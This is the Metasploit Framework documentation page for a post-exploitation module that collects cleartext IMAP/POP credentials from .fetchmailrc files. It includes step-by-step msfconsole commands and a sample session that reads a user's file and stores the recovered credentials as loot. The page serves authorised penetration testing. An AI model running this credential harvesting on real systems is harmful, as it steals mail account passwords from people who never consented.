CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/multi/gather/fetchmailrc_creds.md
Views: 11789

Vulnerable Application

Post module to obtain credentials saved for IMAP, POP and other mail retrieval protocols in fetchmail's .fetchmailrc.

This file is kept in user's home directories to configure fetchmail, but contains cleartext credentials.

Example fetchmailrc file

Example documentation can be found in the fetchmail handbook: https://docs.freebsd.org/doc/6.0-RELEASE/usr/share/doc/handbook/mail-fetchmail.html#:~:text=fetchmailrc serves as an example,user on the local system.

echo "poll example.com protocol pop3 username \"joesoap\" password \"XXX\"" > ~/.fetchmailrc

Verification Steps

  1. Start msfconsole

  2. Get a shell on a system

  3. Do: use post/multi/gather/fetchmailrc_creds

  4. Do: set session [session]

  5. Do: run

  6. If any .fetchmailrc files exist with credentials, they will be read and stored into a loot file.

Options

Scenarios

Ubuntu 22.04.01

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Name  Type         Information   Connection
  --  ----  ----         -----------   ----------
  1         shell linux  SSH ubuntu @  2.2.2.2:39857 -> 1.1.1.1:22 (1.1.1.1)

msf6 auxiliary(scanner/ssh/ssh_login) > use post/multi/gather/fetchmailrc_creds
msf6 post(multi/gather/fetchmailrc_creds) > set session 1
session => 1
msf6 post(multi/gather/fetchmailrc_creds) > run

[*] Parsing /home/ubuntu/.fetchmailrc
                
.fetchmailrc credentials
========================

 Username  Password  Server       Protocol  Port
 --------  --------  ------       --------  ----
 joesoap   XXX       example.com  pop3

[*] Credentials stored in: /root/.msf4/loot/20221008102916_default_1.1.1.1_fetchmailrc.cred_476989.txt
[*] Post module execution completed